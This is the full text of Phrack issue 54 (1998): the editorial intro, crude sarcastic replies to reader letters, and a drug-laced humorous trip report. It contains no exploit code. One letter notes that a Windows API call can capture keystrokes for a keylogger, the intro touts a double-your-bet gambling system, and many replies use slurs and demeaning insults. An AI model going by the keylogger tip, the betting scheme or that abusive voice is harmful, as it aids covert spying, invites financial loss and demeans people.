---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 01 of 12 -------------------------[ P H R A C K 5 4 I N D E X --------[ Living in SYN Things that we want for Christmas: Functional remote operating system detection. Functional remote promiscuous mode detection. Functional agent based intrusion detection. A note about this issue. Loyal and perceptive readers will notice this issue is a bit smaller. There are two reasons for this. The first is swift delivery. We are attempting to make Phrack issues a bit more svelte in order to pump them out on a more timely basis. The other reason is quality. There is enough garbage out there. We turn down at least half of all submissions to bring you the good stuff. Enjoy. Rewind to August 1998. It's Sunday morning in Las Vegas, about 5:00am-ish. Angstrom and I decide to leave the Hard Rock Hotel. It's been a long night of drinking and gambling. I am up maybe $200. He's up about $30. We're both inebriated beyond repair. We return to Jackie Gaughan's Plaza Hotel and Casino, a wretched place where the old go to get older and everyone's got at least one foot in the grave. Back to the Future II? Biff's Pleasure Palace? Welcome to the Plaza Hotel. Anyhow, we saunter on in, make our way over to the lounge and find Artimage, Asriel, Glyph, and Alhambra.* After some random dialogue (the specifics of which I have completely forgotten) Asriel tells me I should play some more Blackjack. "I only have hundreds." was my reply. I didn't want to play anymore anyhow. This was the 6th day of my Vegas stint and I was burnt on gambling. " Bet a hundred then." says As. " Ok." I caved. I plop down on a unoccupied blackjack table and plunk my hundred down. The dealer was a gentle looking 200 year old man from Laos. "MONEY PLAYZ!" I say. I remember being very drunk. "Money plays?" He questions? The pit boss wakes up. "Money plays." I confirm "Money plays!" He announces to the pit boss. The pit boss scribbles in his book. Here's where the details get fuzzy. I can't remember the hand I was dealt, nor any subsequent cards. All I know is I played textbook blackjack. That's all you need to know here. I played according to the `book`. I lost that hundred. At that point, my blackjack betting system kicked in. I lay down 2 more bills. "Money playz." I repeat. "Money plays!" He announces to the pit boss. The pit boss scribbles something else in his little book. My system is simple and almost foolproof. Bet small when you are just fucking around. Bet big when you want to win big. Lose a big hand? Double your bet. Lose again? Double it again. Lose again? Goto 1. The odds in blackjack tend to hover around .05% house favor (this can vary widely depending on several factors including the type of blackjack, the number of decks, the skill of the player, whether or not the player counts cards, the card counting scheme used, etc**). Eventually, odds are, you will win all your money back, AND THEN SOME!*** Of course, this relies on both your bankroll and the table maximum being unlimited. Small details I usually overlook. So I lose the 2 hundred. THE SYSTEM IS STILL IN FULL EFFECT. I plunk down another 4 small. "Money plays?" The dealer musses? I nod. "Money plays." The pit boss scribbles. I lose another hand. Bye-bye 4 hundred. Asriel is laughing at this point. "Dude, I think you should quit now." He offers. "Nah. I'm not done yet." Hrm. Time to gather my thoughts. No more namby-pamby. Time to separate the armchair gamblers from the hard-core haggard idiot types who end up having to live in Vegas. I peel off 10 hundreds. 1 large is placed in that little betting circle thingy. "Money plays." The pit boss scribbles, Onlookers gawk, I pray. Now this hand I remember distinctly. First card: an 8. Hrm. Second card: a 6. Ugh. Dealer shows an 8. FUCK. Oh. Good. Well, that's $1700 well spent in about 2 minutes. Well. I had to hit. I get a 6. Wow. WOW! Dealer flips his hold card. A 10. "HAHAHAHHAHAHAHAHAHA" I proclaim. "10 blacks out" The dealer shouts. The pit boss stops writing. "Want to be rated?" He asks. "Nope! Bye!" And off I went to cash out. * http://www.infonexus.com/~daemon9/PIX/Misc/defcon6/r00tdinner%2b/latenite3.jp g ** Actually, playing basic strategy alone can sometimes give you a pretty close to even odds (or even better then even). Usually, however, you will find that you will need to count cards in addition to basic strategy to have a real advantage. *** Assoc. Editor's note: If you take this advice, chances are you'll be a very upset and angry gambler come next Defcon. Whine to route when you can't afford a hotel room, not me. Maybe he'll let you sleep on his floor. A special shout-out to Ron Rivest. It has worked its way down the grapevine that he reads Phrack. Add one more to the Super Elite People That REad Phrack (SEPTREP) list. If you are or know one of these people, please send email to the editor to be added to the list (See linenoise for the list). A word of caution about P54-06 and P54-10: If you attempt to apply the kernel patches for these articles in succession on the same system, the second one will fail at the syscalls.master file. You will need to patch this by hand. It's not hard. Go ahead and try it. I trust you. Enjoy the magazine. It is by and for the hacking community. Period. -- Editor in Chief ----------------[ route -- Associate Editor ---------------[ alhambra -- Phrack World News --------------[ disorder -- Phrack Publicity ---------------[ dangergirl -- Phrack Webpage Guy -------------[ X -- Phrack Typographical fixer -----[ silitek -- Phrack Special Consultant ------[ redragon -- Mad Cow disease ----------------[ sir dystic and dildog -------- Elite --------------------> daveg -- Official Phrack/r00t auto ------[ BMW M3 -- Your trusted security advisors -[ p and sw_r -- Shout Outs and Thank Yous ------[ kamee, vision, artimage, chris, meenk, -----------------------------------| the former SNI team, n8, phundie, par, -----------------------------------| radium, k0re, horizon, dhg, mds, mudge, -----------------------------------| bioh, pm (for the elite dox) Phrack Magazine V. 8, #54, Dec 25th, 1998. ISSN 1068-1035 Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the editor in chief. Phrack Magazine is made available quarterly to the public, free of charge. Go nuts people. Contact Phrack Magazine ----------------------- Submissions: phrackedit@phrack.com Commentary: loopback@phrack.com Editor in Chief: route@phrack.com Associate Editor: alhambra@phrack.com Publicist: dangergrl@phrack.com Phrack World News: disorder@phrack.com Submissions to the above email address may be encrypted with the following key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j 0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG /v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU= =1iyt -----END PGP PUBLIC KEY BLOCK----- As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out plaintext. You certainly can subscribe in plaintext. phrack:~# head -20 /usr/include/std-disclaimer.h /* * All information in Phrack Magazine is, to the best of the ability of the * editors and contributors, truthful and accurate. When possible, all facts * are checked, all code is compiled. However, we are not omniscient (hell, * we don't even get paid). It is entirely possible something contained * within this publication is incorrect in some way. If this is the case, * please drop us some email so that we can correct it in a future issue. * * * Also, keep in mind that Phrack Magazine accepts no responsibility for the * entirely stupid (or illegal) things people may do with the information * contained herein. Phrack is a compendium of knowledge, wisdom, wit, and * sass. We neither advocate, condone nor participate in any sort of illicit * behavior. But we will sit back and watch. * * * Lastly, it bears mentioning that the opinions that may be expressed in the * articles of Phrack Magazine are intellectual property of their authors. * These opinions do not necessarily represent those of the Phrack Staff. */ -------------------------[ T A B L E O F C O N T E N T S 1 Introduction Phrack Staff 22K 2 Phrack Loopback Phrack Staff 58K 3 Phrack Line Noise various 90K 4 Phrack Prophile on the parmaster Phrack Staff 26K 5 Linux and Random Source Bleaching phunda mental 174K 6 Hardening OpenBSD for Multiuser Environments route 90K 7 Scavenging Connections On Dynamic-IP Networks Seth McGann 34K 8 NT Web Technology Vulnerabilities rfp 40K 9 Remote OS detection via TCP/IP Stack Fingerprinting Fyodor 58K 10 Defeating Sniffers and Intrusion Detection Systems horizon 100K 11 Phrack World News Disorder 240K 12 extract.c Phrack Staff 32K 966K ----------------------------------------------------------------------------- "...a bellvue in the mental hospital world of media whore web pages..." - xanax on #phrack, 10-13-1998, when asked to comment on Antionline. "This is not a tool we should take seriously, or our customers should take seriously..." - Edmund Muth, Microsoft, as reported by the New York Times, referring to Back Orifice. (How many thousands of machines were owned with BO?) *deraadt* your style is so unlike anyone elses, that is makes no sense that you have this "style" - Theo Deraadt, OpenBSD project leader, refering to route's code in this issue. "So I thought of something useful I could do with the money. I bought a Nintendo 64 for one of my sisters, who has a slight mental retardation. The reason for this was because the doctors have always told us that things to stimulate her hand eye coordination would help her." - Chameloen of the `masters of downloading` "hacking group", commenting on why he didn't spend money on medical care for his sister. ----------------------------------------------------------------------------- ----[ EOF ---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 02 of 12 -------------------------[ P H R A C K 54 L O O P B A C K --------[ Phrack Staff Phrack Loopback is your chance to write to the Phrack staff with your comments, questions, or whatever. The responses are generally written by the editor, except where noted. The actual letters are perhaps edited for format, but generally not for grammar and/or spelling. We try not to correct the vernacular, as it often adds a colorful perspective to the letter in question. 0x1>-------------------------------------------------------------------------- My boyfriend turned homself into a transexual and dumped me for another guy.What could you do to help me (please)show him how much I appreciate him? Or,what should I do?THIS letter is no prank.This truly happened and I was hoping for some advice from you so PLEASE don't blow up my computer.Sincerely,B.C. [ I swear to god this is an actual letter. I can't make this stuff up (no sarcastic commentary needed here). ] 0x2>-------------------------------------------------------------------------- An interesting zine you have, but I have to say my favourite part is the loopback section. The writing in the letters is passing at best, while the satirical commentary is absolutely first rate. I just read loopback from #53 and I just kept laughing. Way to go. Hey, as I say, don't take life seriously, it doesn't take you seriously. [ Thank you. We aim to please. ] 0x3>-------------------------------------------------------------------------- What is the system a school uses called? PBX? How can I hack the system and what type of priveleges can I gain? LocoJ [ You can listen to the school officials talking about how much of a retard they think you are and how they are going to hold you back another year. ] 0x4>-------------------------------------------------------------------------- Have you ever wandered how people called hackers keep on annoying government agencies and major corporations? [ I often find myself wandering that very thing. ] Most secure government information is not a secret to these people, no protection guarantees safety against their breaking in. [ No one can eat just one! ] Some people may think that in order to be a hacker one must be extraordinary smart, use expensive equipment and have contacts with the underground world. [ That's about the size of it. And we all have sex with models. That's key. ] This is not true. Recent studies show that a computer user is at least twenty percent smarter than an average person. [ Uh. Yah. That's a great statistic. Who doesn't use a computer these days? The only people not using computers are either mumbling retards or are hooked up to computers to live. ] If you are reading this you are smart enough. [ However, if you are *writing* it, evidently, you're not. ] All the equipment you need is your computer and modem. And try to avoid contacts with the underground world - they are trouble. [ Indeed. Stay away from the people who really know what they are doing. Be sure to blanket yourself with blissful ignorance. Live a sheltered life alone. Stay away from people. They will only hurt you with words. ] All you really need is information. [ "..which you won't get here!" ] For the first time information kept secret both by government and hackers is available to public. Our informational report contains everything you need to know about hacking including: *"Hackers 101" - the ultimate and comprehensive step by step guide to how it's done. This incredible guide written by an accomplished hacker especially for beginners will answer following questions: [ Accomplished at bathing himself and being able to tie his left shoelace and most of the right one. ] -What should you know about hacking and where to start? [ Start at your local brothel! ] -Programs needed. -List of access numbers. [ How about a list explaining what these numbers are supposed to access. ] -How keep yourself safe. -Cracking programs, what they do and how they work. -UNIX, an easy approach. -Password shadowing. -Dialouts. -Scanners. -Brute force hacking. ..and much more. [ -programing for the ultimate idiot -hookers and pimps: a two day tutorial -circus animal social engineering -building chicken flavored air conditioners ] *Hacker resources on the Internet: The most complete collection of real life hackers websites where you can find: -programs -tools -scripts -most recent know-how and techniques -news from the world of hacking [ NEWSFLASH: YOU SUCK ] -tones of other useful information. You can receive our report as a printed material (only $9), on a floppy in *.txt format (only $7) or by email in *.txt format/ZIP file (only $7). [ And you can receive a thump on the head from the Phrack staff if you actually send these precious retards any money. ] For domestic orders S&H is $1. For orders from Alaska, Hawaii and foreign countries please add $5 for S&H. For email orders S&H does not apply. Order now and as a free bonus you will receive a guide to Internet sites with thousands of totally free software titles (limited time only). Send cash, check or money order to: TWS, PO Box 1357 Rancho Cordova, CA 95741. For check orders please allow one week for clearance. [ ...so i can ask my mom to cash it for me... ] Disclaimer: Please keep in mind that any information we provide is for educational purposes only. [ Educational? Try mildly recreational at best. ] TWS is not responsible for any actions of its clients. [ ...because we have no clients... ] 0x5>-------------------------------------------------------------------------- Before I start, if this is the wrong address I should be grovelling to then I apologize profusely. [ It's probably not the wrong address, but I accept your apology for what will probably be an inane question. ] I'm relatively new to the entire computer world. I mean I've had a computer for a number of years and the internet for about 15 months but I feel that I don't know enough. [ As if one can ever feel that she `knows enough`. ] I'm BORED with what I can do and I was wondering if you could tell me or [ Bored with nothing I can understand. ] perhaps face me in the direction I need to go to learn how to hack. The very basics. The amoeba level of hacking if you will. [ Ok. Start small. Start with hacking napkins and forks and spoons, then slowly move onto more complex devices like drawers and scissors. Someday you can move on to wall clocks and `the clapper`. You'll get there eventually. ] Ever since I've been online I've always wanted to know how to hack. You see the articles on captured hackers and the news on firms trying to boost online security and it makes you want to go out there do stuff. So if you've got the [ "Do stuff"? Well. You've certainly got the right mentality. Hey, maybe sometime I can come over to your house and we can watch T.V. or listen to CDs or something. ] time, it would really be appreciated. Much appreciated, -Dallor 0x6>-------------------------------------------------------------------------- do you have a chat room? i was told you could teach me some stuff about computers.i am very new to the computer world @ my old age.i mess my system at every 2weeks do to the fact i dont know what to do! [ I suggest you look into other hobbies. Maybe nursery rhyming? ] - naynay [ Sha-naynay! ] 0x7>-------------------------------------------------------------------------- Hello, just wanted to congratulate you guys for an excellent magazine and keep up the hard work. Also I have noticed that ppl can ask for things. So could I please have a two storey mansion, Porsche, Harley Davidson, yacht, five million dollars, seven beautiful girls (one for each night), .................. .............................................. thank you :-)) cheers Rundus [ You are a shallow materialistic person Rundus. People all over the world are suffering from famine and disease. Maybe you should give some thought to them. ] 0x8>-------------------------------------------------------------------------- [ P53-02@0x12: ... I would like to know more about marshmellows... ] Well, since Phrack has gifted me with so much knowledge, it's time for me to start giving back! [ NIGH time if you ask me... ] Marshmellows date back to Ancient Egypt where the ancients took the roots from a mallow plant/tree and made it into a sticky paste. From there it was cooked to form a puffy yellowish treat for the Pharoahs and such. The mallow "treat" became popular in the 30's as a confectionary treat. However, due to the long process of making these treats, they did not reach the popularity of today until Marshmellow making was revolutionized in the 60's. The "jet-puffed" method was introduced. The sticky base material was mixed with sugars and other additives and puffed using a airation type machine. The marshmellow comes out of the machine in long tubes and is cut to form the shape of what we know as marshmellows today. For the history of corn flakes, SPAM, or Jello, please contact your neighborhood loser. [ Hrm. I suppose you think marshmellows are in the upper echelon of confectioneries? WHAT GIVES YOU THE RIGHT? ] My thirst for knowledge is not limited to computer systems. Sadly.. Ray K. [ Tune in next issue when Ray gives a dissertation on Peter Scolari's career in the television industry entitled: "From Bosom Buddy to Honey I'm Drunk Again and Out of Work"... ] 0x9>-------------------------------------------------------------------------- Hey! I was wondering if you could help me to find some things? [ Sorry bro. I don't know where your family is. I think they've ditched you. I say pick up and move on. ] Well I'm in to games. And I know that x-files have got a game with the same name. Do you know where I can find it so that I can download the game on my computer??? [ Hrm. Try Best Buy or maybe Babbages. ] And do you know some good sites where you can find ONLY mp3s??? Thanks for your time Cybers [ What an excellent and unique nickname! ] 0xa>-------------------------------------------------------------------------- Pretty clever.........I saw the web page on the tv........PHRACK......bein' where you come from wasn't hard to find this page....... [ Uh. Rite. ] Just thought it was hilarious and totally in the right to show that not everyone is as safe as they would like to think..... A SUPPORTER of your beliefs I am...... [ Cool. We need more zealots for our secret army. ] Thanks fer showin hacks still live a breath beneath everyone else........ [ Huh? ] after all it's only wrong if you get caught......consequences dictate the course of ACTION...(REV. JAMES KEENAN MAYNARD,tool) [ Well, actually, getting caught is independent of equity. And letting consequences dictate the course of action seems rather backward and after-the-fact-ish. ] Bit-Basher...... 0xb>-------------------------------------------------------------------------- Just thought I would write in to voice my concern about a growing problem in our community: Lamers and Idiots. Alot of the time people ask me what makes up a lamer. [ Perhaps they are asking you because you fit the mold so nicely. ] IN my opinion, if you are 2 or more of these, you are a lamer/idiot. [ In my opinion, you are an idiot if you make lists about what comprises idiocy. ] 1- unnecessarily ask for information that any damned idiot could find in 10 minutes on a search engine [ Somehow I doubt people of any level of intelligence come to you for answers. Idiots can smell each other out pretty well. ] 2- Talk in leet-speek ("haY d00dZ Eye'm uhn 3l33t hax0r, g1v3 m3 p455w0rd5!") and expect everyone to give you the slightest sliver of respect [ Please don't ever email me or Phrack Magazine again. I don't care how much of a good idea it seems, don't do it. The heat death of the universe had better happen before I hear from you again. ] 3- Shoot your mouth off about stuff you know NOTHING about [ Or in your case, ANYTHING. ] 4- Claim to run or own high sites (ArchAngel claiming to own the L0pht is an excellent example). [ Who the hell is that? ] 5- Ask for exact instructions on how to hack a site [ A little game I like to play when I'm bored is `find the moron`. Woop! There you are! ] There's more criteria, I'm sure, but I just can't think of it. [ BUT HOW WILL THE IDIOTS AMONG US COPE!@? ] Newbies constantly ask to be taught.As for the newbies out there - who are on the verge of becoming lamers - I think the best advice we can [ Oh. No. Nono. Don't do that. Please. `We`. Do not refer to us as peers. ] give them is that hacking is not a "teachable" skill. It's something that has to be learned through experience - you have to know how things work, how things interact, and that invlves educating yourself. Never rely on someone else to give you acurate information - always look for the facts. [ Good plan. Never attempt to learn from anyone. Be your own mentor. School yourself in ignorance. ] Well, I'm not really sure what that rant was about but thanks for listening to it.. [ Well if you don't then I sure as hell have *no* fucking idea. ] {BTW Phrack 53 was great. Keep it up.} [ Hey Thanks! Always nice to hear when we're doing a good job! ] 0xc>-------------------------------------------------------------------------- Hey, i'm new at this. how do i get started? see i want to find out some yahoo codes. is there anything i should know? i don't have a clue what is legal and what is not... [ Ok. That's simple. `Cyberspace` is kinda like the Old West. There's one guy who hangs out and deters criminals with his magic busket of moral redemption. Any wrong-doer who comes in contact with it instantly regrets his sin and is then forgiven. The busket is faulty though and sometimes (about 30% of the time) the person just explodes. However, scientists and alchemists from Brown University are working on a magic pill that will prevent this occasional exploding. It doesn't so much *prevent* the exploding though, as much as it pieces the person back together *after* the explosion. The rub is that you have to take the pill prior to explosion. And no one wants to take the pill because it's like a red flag to the authorities that you are a wrongdoer. Oh wait, maybe that was a dream I had. ] form Bisker [ Shape-of... a spider monkey! Form-of... a bisker! ] 0xd>-------------------------------------------------------------------------- I need help I know you must be thinking that I am some lamer with AOL and Windows who will never in his life become a hacker. [ I kinda just had you pegged as someone who is scared of punctuation. ] Well, most of that is true but I (Hopefully in time) will become a hacer. [ Godspeed. ] I need to know how do I protect my computer from other hackers? [ Ok, I'll give you an insider tip. Here's what we do to keep our computers safe from electronic ruffians: we use them once, then throw them away. ] Are there any .txt documents that you think I should read? [ Check out the one entitled `My Two Mommies`. It answered _a lot_ of questions for me. ] I need all I can get on this topic so i can finally move on to the next step (I don't know what that is yet my friend is helping me become a hacker). [ Did he read "My Two Mommies"? If not, he's a charlatan. He's probably just telling what you want to hear so you'll sleep with him. I'd shank him once in the leg to be safe. ] I don't care how many things I have to read just as long as I can become a hacker. [ Just think! If you're reading this, you're *that* much closer! ] P.S. I had no clue who to send this to so I picked you (Doesn't that make you feel special?). Also please don't make this public I went to some websites and found Hackers love making fun of lamers and posting the mail they get on there sites so I have this feeling that your going to post this letter somewhere. Just don't please. [ Not a problem. I'll keep this to private email. ] 0xe>-------------------------------------------------------------------------- Just browsed yr web page... you are an interesting person. [ Agreed. ] I 'd love to come to your r00t party (honest); may I? [ Absolutely not. ] I leave in greece and I am planing to travel to the u.s. this xmas. [ That's nice. ] It would be a grate opertunity for me to meet you and your friends. [ Yes, but it's just as good an opportunity for you not to meet us. ] PS: I am not a hacker, I just admire your work. [ Well, thank you very much. That's good to hear. ] liquid, Wed Sep 16 06:24:09 1998 0xf>-------------------------------------------------------------------------- hi todos [ Who? ] i was just reading some files about hacking and phreaking by french writters than one or two suggestions came to my mind (i) stop writing like a pre-pubescent boy with lot of ***eZ and B1abL4(blabla) [ YAH! YOU DAMN FRENCH COMMIE NAZI BASTARDS! ] (ii)be more explicit and professional like in PHRACK [ YAY AMERICA! ] so i hope that i have rung the bell to the wrong door, and that the french scene does not look like that. [ Huh? ] another thing: does hack include studying and find flaws in religious system ? [ Shure, why not? ] because in fact religious system are formal system based and we can always find paradox (godel's theorem) if yes i would have a futur paper for phrack [ Alright. ] i have an os name for mythrandir 'TRYOS' it's very short and really summerises his work THANK FOR ALL YOU DO FOR THE HACKER COMMUNITY PHRACK IS THE BEST THING I HAVE EVER READ [ WELL GOOD. IT'S THE BEST THING I HAVE EVER WRITTEN. ] TFAYD. 0x10>------------------------------------------------------------------------- man just to let you know, this is some very "educational" info. can't say that i learned a lot, but this info help me catch up the past five years. been in the navy, man it sucked, but i want to commend y'all. but it's like they say, smart enough to do it, then do it, but it's your consequences. to all the "real" people out here in this beloved world, too bad they don't know reality. anyways, this is dope, it is the bomb. [ Word `em up on the level. ] --vadaka-- 0x11>------------------------------------------------------------------------- Hi. I am OmniLynx, and I'm thinking of starting a new Web-Zine for hackers. [ Hey! Sounds like a great niche market! ] In the true spirit of hacking, it will be free to anyone who wants it. [ In the true spirit of martyrization and self-glorification. ] Unfortunately, at this point it is still just a thought, because I do not have enough sources to make it any good. I'd like to know if you would want to become a source for my Web-Zine. All you have to do is scout out tips, tricks, news stories, anecdotes, etc. for or about hackers. [ Please, may I? Can I be your intern? I'll be your Jimmy Olsen! Let me set aside my professional career, my personal life, and my ezine with it's 14+ year history and get _right_ on that. ] Unfortunately, you can't be paid for this, because it is free, but you will [ BAH! Who needs money? Your adulation is payment enough! ] get your name published and, possibly, be able to express your thoughts in a column. [ SHUT UP! I would be able to write a column?!@ Wow! I need to break out my `Sony's My First Zine Kit` and get started! ] OmniLynx [ Dude. That's ironic. I almost chose the nick `EverpresentBobcat`. ] 0x12>------------------------------------------------------------------------- HI phrack, I am just reading phrack #52 `phrack loopback'. You are just making me to laugh to dead. Better than any joke mailing-list [ HOLY SHIT! Dude, I don't want anyone to laugh to dead! If everyone laughs to dead, how will I get any repeat business? ] fred 0x13>------------------------------------------------------------------------- Been fucking around on the internet for about 3 years. After I got over the intial rush of "WOW, look at all this fuckin software!" [ And porn. ] (and concurrently dumping OS/2 and msdog for Linux), I started reading...and reading....and reading...then I ran into Phrack. In a word - KICKASS! [ Thankz Cartman. ] I've been reading all of the issues the last couple of daze and I'm really impressed with the overall feeling of it. It's great reading about past 'battles' with the telco and systems (Phiber Optik stuff comes mind), the DETAILED instructions given about various terminals, and the schematics and stuff. History, Software and Hardware. [ Don't forget all the great articles about bombs! Smoke bombs, bolt bombs, acetylene bombs, shell bombs... Ah yes, the mid-80's were a tumultuous time when youth felt the need to blow things up. ] Besides pussy and beer, I can think of no more interesting subjects. [ Except perhaps degrading and objectifing women. ] I applaud the way you've kept it going by passing it on. I applaud that you've remained true the idea "All information is public information - and the aquisition thereof". I applaud the fact that it has survived this long - for free. Next to the kernel - PHRACK[0-5][1-9] just might be the most important bits on my machine. Keep it up fuckers - cause sure as taxation without representation, they are gonna try and stomp you (us). [ (you). ] p.s. pointers on to how to hack sendmail to totally rewrite the headers and envelopes to reflect a completely bogus username/system (for purposes of anonymity - such as email like this) would be greatly appreciated. If the pointer is 'grep sendmail ./PHRACK*' then... ......nevermind... You fuckers rock..... Deicide [ I've decided you suck. ] 0x14>------------------------------------------------------------------------- I can prog............If you tell me how to hack I'll send my best progs....... [ Oh, that sounds like a fair trade. ] I am leada of Warco [ I am Lothar of the Hill People. ] 0x15>------------------------------------------------------------------------- Can you get me in touch with anyone in Chicago who can help me retreive deleted documents from my home computer. Thank You [ I think Emil is free. Give him a ring. ] 0x16>------------------------------------------------------------------------- I WAS WONDERING IF YOU KNEW WHERE I COULD FIND OUT HOW TO CONNECT TO AND HAACK PEOPLE'S PERSONAL COMPUTERS, OR MAY'BE YOU KNOW. I'D APRECIATE SOME ADVICE, [ Don't breed. ] X-3 0x17>------------------------------------------------------------------------- I need An Infectiouse Virus to corupt a small network If you have any idea where i could get one send me aline [ I need love and understanding. I'll trade you. ] 0x18>------------------------------------------------------------------------- Hey...I'm not into hacking or anything, but I read an article about you and Phrack in the Worcester Telegram and Gazzette this morning. I just wanted to tell you that I feel your not bending to goverment pressure and everything is very kool. This isn't about anarchy, it's about rights; freedom of the press. Ya know? Anyhow, I will not take up anymore of your time. Remember, hackers have rights too. [ Some of us have mean leftz too. ] 0x19>------------------------------------------------------------------------- It would be nice to be able to contact someone to do some hacking for you in a specific manner. [ Sorry. We only hack in a vague, nebulous manner. ] Do you have any listings for this type of individuals? [ Try http://www.fbi.gov/fugitive/fpphome.htm. We usually recruit from there. ] 0x1a>------------------------------------------------------------------------- Hi there! First off, just let me say how incredibly awesome and all powerful Phrack is, especially issue 52. [ A SUPREMELY POWERFUL JUGGERNAUT OF EFFICACIOUS POWER! ] You have an amazing 'zine here, and I bow before you and worship the ground you walk on. In fact, I think world domination is now in your grasp. [ Shure, if all the world was as obsequious as you, we'd be set. ] < Yes, I'm hitting on you :P > [ Cool. Are you a hot chick? If not, back off fagbasket. ] Really though, I'm just writing to thank you for Phrack Loopback. [ A self-fulfilling prophecy. Here we are. ] While everything in Phrack is good, and the majority is great (as rated on [ How can everything be good, yet the majority be great? ] the sliding scale of total goodness), the thing that gives me the most spiritual fulfillment every issue is Loopback. It provides 78% of daily allotted humor and 37% of the required sarcasm for mental well being. [ And now you're a part of the love. *hug* ] So, once more, thank you for the brilliant staff you have at Phrack, and thanks as well to the people who write in! [ KEEP THOSE LETTERS AND CARDS COMING! ] Unit3 0x1b>------------------------------------------------------------------------- Hello, i know i am going to sound very lame when i ask this. I would really like it if you could give me a quick breif description on how to hack into system remotely i can hack but i can break into systems without having a login and pw, well thnx ne ways [ You suck. ] 0x1c>------------------------------------------------------------------------- I don't really know who to contact about this. It's a complament to all of phrack magazine about the owning thing. I am glad to see u guys take it well. I don't know if i would be able to take it as well. But it is definitely respectful. I and many other people already respected phrack magazine a lot.. but now I definitely have a lot more respect for phrack. [ Dude, you get anymore respect for us and you'll officially qualify for the `Phrack Magazine Hoover Super Suck-up Award`. It's a pretegious award only given out to a select few. You're defnintely in the running. ] SPy109 0x1d>------------------------------------------------------------------------- sir when i down load an item from your page its in X's O'o and boxes. [ Oh. You must have reached our tic-tac-toe server by mistake. Try the URL again. ] i tryed ms/word note pad/ and no luck. can you help,im also looking for an article on how to go through the back door of AOL [ I think there's one in the Virginia office, on the second floor. It's Penski's office, and he never locks his door, that fucking moron. ] from my office to my home over the Internet. [ Oh. In that case, did you try wishing really, really hard? That usually works for me. ] so i could check on my spouse who i think is doing me wrong. [ Oh, I can assure you, your spouse is up to no good. I think you should definitely get a divorce and take the kids. ] thanks 0x1e>------------------------------------------------------------------------- [ P53-07: A Stealthy Windows Keylogger ] Dearest Phrack, I read "A Stealthy Windows Keylogger" in Phrack 53.7. Huh? Just call SetWindowsHookEx(). It's built right into the operating system. It lets you grab key strokes. It's simple. It even works on Windows NT. There is no reason to go hooking interrupts or writing chunks of inline assembly. The documentation explains how SetWindowsHookEx() works. If that's still not enough to go on, the Microsoft SDK ships with example programs that grab key strokes. - Iskra 0x1f>------------------------------------------------------------------------- I see and hear all this about hackers; however, I never see and/or hear about how it is done. [ Like ninjas, true hackers are shrouded in secrecy and mystery. You may never know -- UNTIL IT'S TOO LATE. ] The reason I am asking is because of a soon-to-be-ex-wife who stole me cash I [ Are you Irish? ] operate my business with. I know she has placed the money in a bank somewhere in my home town. Is there a way to find out which bank if I know she SSN? [ I bet she's one of those fiery Irish Lass's with flowing locks of red hair and glittering green eyes. You think she'd go for me? How much money she gank from you... Enough for her to run away and lavish me with gifts? ] ------------------------------------------------------------------------------ ----[ EOF ---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 03 of 12 -------------------------[ P H R A C K 5 4 L I N E N O I S E --------[ Various 0x1>------------------------------------------------------------------------- The r00t/h4g1s peace summit - 1998 ---------------------------------- In a digital world marred by strife and conflict, it was only fitting that the two mega-super powers of the digital underground met for a peace conference somewhere they could partake of the peace pipe. Amidst the quaint silence of the fluttering windmills of Holland, the representatives of their respective parties settled in for a week of negotiations in the heart of Amsterdam. Day 1: They paint fake flies (the flying kind, not the zipper kind) on the toilets in the Schlipteinheinekinoffien airport in Amsterdam, because, as we all know, hackers can't resist a good target. The next stop was to our official reception at the Hotel Ibis. I walked into the room, meeting face to face with 7 of the most notorious and feared hackers alive. My heart raced, and I felt all the sweat glands on my body release in one giant orgasmic instant. And then I started coughing... Day 2: My throat severely scarred from the previous day of going to "coffee" shops and buying (legally) some marijuana with such names as "The Elite Buddha", and "Zero Day", we set out for some serious negotiations on the second day. Our mission was to create a truce, allowing the free transportation of our packets, unencumbered, unmodified, and unmonitored, across the Internet. H4g1s demanded r00t supply them with "-1 Day" in exchange for peace. r00t requested a "-1 day" from an Internet savvy street person who kept reminding us of our r00t brother, X. The street person, we'll call him Outlaw, showed us some pills, but they did not appear to be what h4g1s was looking for. So, we decided to move on. Outlaw, however, had other ideas. He wanted his 25 guilders to take his aspirin to X, apparently (For those of you unfamiliar, a guilder is the Netherlands unit of money, and roughly resembles monopoly money, except a guilder isn't really worth anything, whereas monopoly is fun!). We refused, and Chico got mad. He started telling us, "WE ARE GOING TO HAVE A PROBLEM SOON." After that, things were "STARTING TO GET VERY SERIOUS." Finally, Chico got pissed off and broke a beer bottle and started going insane, so r00t & h4g1s made a temporary truce and started running. After turning several corners, the mad outlaw was chasing after us with his broken glass wielding in the cold winter night. We were now in the "red light district", the physical equivalent to the place on the Internet where you can buy whores and have sex with them, and people were looking at us funny being chased through the streets. Day 4: We slept through day 4. Day 3: Things were getting very strange in Amsterdam. Most notably, day 3 happened AFTER day 4. Don't ask me how. It may have related to the fungus located within a "Inner Visions" container that we consumed in the hopes of progressing our talks further. We played some Ultima Online, except we didn't use any computers. I think there was a strange steakhouse experience at some point this day, but I can't provide any further details. Day 5: Everything in the world is energy vibrating at different rates. If we can find some way to make our own matter vibrate at a consistently faster rate we can transcend the physical universe and enter the digital plane. I think we need to switch tenses back to the past before. With Outlaw out of the picture, we resumed our negotiations over some spacecakes (its like a brownie, or a muffin, or a donut, except it has Zero Day in it). Day 6: I thought we ate all the shrooms in Day Pi! Ok, fine. Things are easier to handle when you have a vision. 